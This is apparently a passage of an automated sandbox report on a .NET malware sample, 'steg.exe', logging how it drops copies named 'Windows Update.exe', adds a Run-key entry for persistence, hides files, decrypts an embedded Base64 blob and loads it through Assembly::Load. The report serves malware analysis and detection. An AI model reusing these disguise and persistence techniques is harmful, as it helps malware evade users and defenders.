                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                                Source: steg.exe, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: Windows Update.exe.0.dr, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 0.0.steg.exe.f80000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 0.2.steg.exe.f80000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: WindowsUpdate.exe.4.dr, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 4.0.Windows Update.exe.10000.9.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 4.0.Windows Update.exe.10000.6.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 4.0.Windows Update.exe.10000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 4.0.Windows Update.exe.10000.3.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 4.2.Windows Update.exe.10000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, Form1.csBase64 encoded string: 'HLjw+uQlfj/cTMG+SN5gI9FjTJdblwS/zT57JSzaDjQXfyYEIC7qOaz7nLEILo0V'
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                                Source: steg.exe, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                                Source: steg.exe, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                                Source: steg.exe, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                                Source: steg.exe, Form1.csCryptographic APIs: 'CreateDecryptor'
                                Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                                Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                                Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                                Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                                Source: steg.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                Source: C:\Users\user\Desktop\steg.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                                Source: steg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: steg.exeStatic file information: File size 1167872 > 1048576
                                Source: steg.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x119c00
                                Source: steg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbfX source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb] z source: Windows Update.exe, 0000000E.00000002.360415585.00000000074C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.357606780.00000000011EE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbQ source: Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Users\user\AppData\Roaming\Windows Update.PDB source: Windows Update.exe, 0000000E.00000002.360415585.00000000074C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb* source: Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbT source: Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 1ioC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbf source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\dll\mscorlib.pdb* source: Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\mscorlib.pdb 1X source: Windows Update.exe, 0000000E.00000002.360415585.00000000074C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: rlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\dll\mscorlib.pdbf source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp

                                Data Obfuscation

                                barindex
                                .NET source code contains potential unpacker
                                Source: steg.exe, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: Windows Update.exe.0.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 0.0.steg.exe.f80000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 0.2.steg.exe.f80000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: WindowsUpdate.exe.4.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 4.0.Windows Update.exe.10000.9.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 4.0.Windows Update.exe.10000.6.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 4.0.Windows Update.exe.10000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 4.0.Windows Update.exe.10000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 4.2.Windows Update.exe.10000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_01072941 push ecx; ret 0_2_01072954
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FEEC9C push ecx; ret 0_2_00FEECAF
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_00102941 push ecx; ret 4_2_00102954
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4_2_0007EC9C push ecx; ret 4_2_0007ECAF
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_003B2941 push ecx; ret 12_2_003B2954
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0032EC9C push ecx; ret 12_2_0032ECAF
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 12_2_0254049C push ebx; retf 12_2_0254049D
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00BB2941 push ecx; ret 14_2_00BB2954
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_00B2EC9C push ecx; ret 14_2_00B2ECAF
                                Source: C:\Users\user\Desktop\steg.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Changes the view of files in windows explorer (hidden files and folders)
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\steg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
